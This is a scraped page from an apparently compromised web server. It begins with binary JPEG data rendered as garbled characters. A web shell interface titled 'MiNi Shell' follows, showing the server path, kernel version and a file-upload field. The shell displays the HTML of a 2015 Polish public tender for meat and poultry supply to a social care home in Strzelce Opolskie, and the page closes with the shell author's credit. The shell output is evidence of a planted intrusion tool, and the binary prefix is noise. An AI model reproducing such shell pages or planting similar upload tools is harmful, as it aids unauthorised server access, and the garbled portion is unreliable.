JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150114/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150114/9524-N-2015.html

<p class="kh_header"><b>Strzelce Opolskie: Sukcesywna dostawa  mięsa i  wędlin  oraz  kurczaków  i  artykułów  drobiowych  dla  Domu  Pomocy  Społecznej  
w  Strzelcach  Op. z  filią  w  Szymiszowie  i  filią  w Leśnicy  ul. Strażacka 8.</b><br>
<b>Numer ogłoszenia: 9524 - 2015; data zamieszczenia: 14.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Strzelcach Opolskich z Filią w Szymiszowie i Filią w Leśnicy , ul. Strażacka 8, 47-100 Strzelce Opolskie, woj. opolskie, tel. 077 4613480, faks 077 4613480.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.dps.strzelceop.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa  mięsa i  wędlin  oraz  kurczaków  i  artykułów  drobiowych  dla  Domu  Pomocy  Społecznej  
w  Strzelcach  Op. z  filią  w  Szymiszowie  i  filią  w Leśnicy  ul. Strażacka 8..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa mięsa i wędlin oraz kurczaków
i artykułów  drobiowych dla  Domu  Pomocy  Społecznej w  Strzelcach  Op. z  filią  
w Szymiszowie i  filią  w  Leśnicy  ul. Strażacka 8   w  ilościach:                                                                                                                                                                                                                 
Część  I - załącznik  nr  2: mięso  i  wędliny w  ilościach:
Baleron  gotowany - 360kg,  boczek  wędzony - 500kg,  flaki  wołowe  krojone  -  500kg,  frankfurterki - 75kg,  mięso  wieprzowe gulaszowe pokrojone w kostkę - 1600kg,  karczek bez kości  -1300kg,  kaszanka  luzem -430kg,  kiełbasa  śląska - 1500kg, kiełbasa biała - 20kg, kiełbasa kminkowa -280kg,  kości  wieprzowe (karczkowe lub schabowe) 1000kg,  kości  wołowe - 200kg, kiełbasa krakowska wieprzowa  parzona -600kg,  łopatka bez kości - 800kg,  metka (cebulowa, paprykowa) - 260kg,  kiełbasa mielonka - 350kg, mięso  mielone  (wołowo-wieprzowe)  - 420kg,  mortadela wieprzowa - 300kg,  parówka  cieńka  - 800kg,  parówka  gruba -  800kg,  pasztetowa  folia - 200kg,  pieczeń  rzymska, cebulowa, paprykowa - 180kg, kiełbasa gruba piwna  wieprzowa - 150kg, polędwica sopocka - 150kg, salceson  biały  w  folii  380kg, schab  bez  kości  - 480kg,  słonina  świeża  zmielona  -  220kg,  szynka  gotowana  -  420kg,  szynka  wieprzowa  mięso b/kości  - 330kg,  kiełbasa  szynkowa  wieprzowa - 630kg,  wołowe  na  rolady  - 180kg, kiełbasa  zwyczajna  - 200kg,  żeberka  wieprzowe  1050kg.
   
Część  II - załącznik  nr  3 : kurczaki  i  artykuły drobiowe  w ilościach:  :  filet z kury  bez skóry  świeży - 850kg,  kurczak  cały  świeży  - 2900kg,  polędwica  z  drobiu  -  400kg,  porcje rosołowe  świeże  - 100kg,  udko z drobiu świeże  (noga z kurczaka bez kości grzbietowej) - 2200kg,  wątróbka  drobiowa - 450kg.    

Zamawiający  dopuszcza  składanie  ofert  częściowych,   obejmujących  jedną  lub dwie  części  zadania.
Wykonawca może  złożyć  ofertę  na  całość  jak  również  na  jedną  z  w/w  części  zamówienia.
Zamówienie  składa  się  z  dwóch  części :
I  część  - zadanie  pod  nazwą:  Sukcesywna  dostawa  mięsa i wędlin dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op. z  filią  w  Szymiszowie  i  filią  w Leśnicy  
ul. Strażacka 8.
II część  - zadanie  pod  nazwą:  Sukcesywna  dostawa kurczaków  i artykułów  drobiowych  dla Domu Pomocy Społecznej w Strzelcach Op. z filią  w  Szymiszowie  i  filią  w   Leśnicy  ul. Strażacka  8.

Wspólny  Słownik  Zamówień  CPV  
15110000-2 Mięso
15111100 -0 wołowina
15113000-3  wieprzowina 
15131120-2 produkty wędliniarskie
15131620-7 wołowina mielona
15113000-3 wieprzowina
15131134-3 kaszanka i inne wędliny krwiste
15131410-2 szynka
15131400-9 produkty wieprzowe
15112000-6 drób
15112130-6 kurczęta
15112100-7 świeży drób 
15112300-9 wątróbka drobiowa.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.11.00-0, 15.11.30.00-3, 15.13.11.20-7, 15.11.30.00-3, 15.13.11.34-3, 15.13.14.10-2, 15.13.14.00-9, 15.11.20.00-6, 15.11.21.30-6, 15.11.21.00-7, 15.11.23.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie  spełniania  warunków  j.w.  odbywać  się  będzie  poprzez  badanie  treści  dokumentów  załączonych  w  treści  oferty  oraz  innych  koniecznych  czynności  zmierzających  do  zbadania  poprawności  i  wiarygodności  złożonej  oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie  spełniania  warunków  j.w.  odbywać  się  będzie  poprzez  badanie  treści  dokumentów  załączonych  w  treści  oferty  oraz  innych  koniecznych  czynności  zmierzających  do  zbadania  poprawności  i  wiarygodności  złożonej  oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie  spełniania  warunków  j.w.  odbywać  się  będzie  poprzez  badanie  treści  dokumentów  załączonych  w  treści  oferty  oraz  innych  koniecznych  czynności  zmierzających  do  zbadania  poprawności  i  wiarygodności  złożonej  oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie  spełniania  warunków  j.w.  odbywać  się  będzie  poprzez  badanie  treści  dokumentów  załączonych  w  treści  oferty  oraz  innych  koniecznych  czynności  zmierzających  do  zbadania  poprawności  i  wiarygodności  złożonej  oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie  spełniania  warunków  j.w.  odbywać  się  będzie  poprzez  badanie  treści  dokumentów  załączonych  w  treści  oferty  oraz  innych  koniecznych  czynności  zmierzających  do  zbadania  poprawności  i  wiarygodności  złożonej  oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>druk oferty - załącznik nr 1, formularz ofertowy na dostawę mięsa i wędlin - załącznik nr 2, formularz ofertowy na dostawę kurczaków i artykułów drobiowych - załącznik nr 3, w 
      przypadku , gdy  ofertę  podpisują  osoby,  których  upoważnienie  do  reprezentacji  nie   
      wynika  z  dokumentów  rejestrowych  załączonych  do  oferty,  wymaga  się,  aby   
      wykonawca  dołączył  do  oferty  oryginał  pełnomocnictwa  do  podpisania  oferty,  informacje  zawarte  w  ofercie,  stanowiące  tajemnicę  przedsiębiorstwa  w  rozumieniu       
        przepisów  o  zwalczaniu  nieuczciwej  konkurencji  muszą  być  oznaczone  klauzulą: 
       Dokument  stanowi  tajemnicę  przedsiębiorstwa  w  rozumieniu  ustawy  o  zwalczaniu     
       nieuczciwej  konkurencji i  wydzielone  w  formie  załącznika.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dps.strzelceop.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Strzelcach Op. ul. Strażacka 8  budynek  główny  DPS,  III piętro,  dział  administracji  i  obsługi..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2015 godzina 09:50, miejsce: Siedziba  zamawiającego  w  Strzelcach  Op., ul. Strażacka  8,  budynek  główny,  sekretariat,  III  piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> załącznik  nr  2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa mięsa i wędlin  dla  Domu  Pomocy  Społecznej w  Strzelcach  Op. z  filią  
w Szymiszowie i  filią  w  Leśnicy  ul. Strażacka 8   w  ilościach:                                                                                                                                                                                                                 
Część  I - załącznik  nr  2: mięso  i  wędliny w  ilościach:
Baleron  gotowany - 360kg,  boczek  wędzony - 500kg,  flaki  wołowe  krojone  -  500kg,  frankfurterki - 75kg,  mięso  wieprzowe gulaszowe pokrojone w kostkę - 1600kg,  karczek bez kości  -1300kg,  kaszanka  luzem -430kg,  kiełbasa  śląska - 1500kg, kiełbasa biała - 20kg, kiełbasa kminkowa -280kg,  kości  wieprzowe (karczkowe lub schabowe) 1000kg,  kości  wołowe - 200kg, kiełbasa krakowska wieprzowa  parzona -600kg,  łopatka bez kości - 800kg,  metka (cebulowa, paprykowa) - 260kg,  kiełbasa mielonka - 350kg, mięso  mielone  (wołowo-wieprzowe)  - 420kg,  mortadela wieprzowa - 300kg,  parówka  cieńka  - 800kg,  parówka  gruba -  800kg,  pasztetowa  folia - 200kg,  pieczeń  rzymska, cebulowa, paprykowa - 180kg, kiełbasa gruba piwna  wieprzowa - 150kg, polędwica sopocka - 150kg, salceson  biały  w  folii  380kg, schab  bez  kości  - 480kg,  słonina  świeża  zmielona  -  220kg,  szynka  gotowana  -  420kg,  szynka  wieprzowa  mięso b/kości  - 330kg,  kiełbasa  szynkowa  wieprzowa - 630kg,  wołowe  na  rolady  - 180kg, kiełbasa  zwyczajna  - 200kg,  żeberka  wieprzowe  1050kg.Zamawiający  dopuszcza  składanie  ofert  częściowych,   obejmujących  jedną  lub dwie  części  zadania.
Wykonawca może  złożyć  ofertę  na  całość  jak  również  na  jedną  z  w-w  części  zamówienia.

I  część  - zadanie  pod  nazwą:  Sukcesywna  dostawa  mięsa i wędlin dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op. z  filią  w  Szymiszowie  i  filią  w Leśnicy  
ul. Strażacka 8..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.11.00-0, 15.11.30.00-3, 15.13.11.20-7, 15.11.30.00-3, 15.13.11.34-3, 15.13.14.10-2, 15.13.14.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> załącznik nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa  kurczaków
i artykułów  drobiowych dla  Domu  Pomocy  Społecznej w  Strzelcach  Op. z  filią  
w Szymiszowie i  filią  w  Leśnicy  ul. Strażacka 8   w  ilościach:                                                                                                                                                                                                                 

   
Część  II - załącznik  nr  3 : kurczaki  i  artykuły drobiowe  w ilościach:  :  filet z kury  bez skóry  świeży - 850kg,  kurczak  cały  świeży  - 2900kg,  polędwica  z  drobiu  -  400kg,  porcje rosołowe  świeże  - 100kg,  udko z drobiu świeże  (noga z kurczaka bez kości grzbietowej) - 2200kg,  wątróbka  drobiowa - 450kg.  Zamawiający  dopuszcza  składanie  ofert  częściowych,   obejmujących  jedną  lub dwie  części  zadania.
Wykonawca może  złożyć  ofertę  na  całość  jak  również  na  jedną  z  w-w  części  zamówienia.
Zamówienie  składa  się  z  dwóch  części :

II część  - zadanie  pod  nazwą:  Sukcesywna  dostawa kurczaków  i artykułów  drobiowych  dla Domu Pomocy Społecznej w Strzelcach Op. z filią  w  Szymiszowie  i  filią  w   Leśnicy  ul. Strażacka  8..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.21.30-6, 15.11.21.00-7, 15.11.23.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com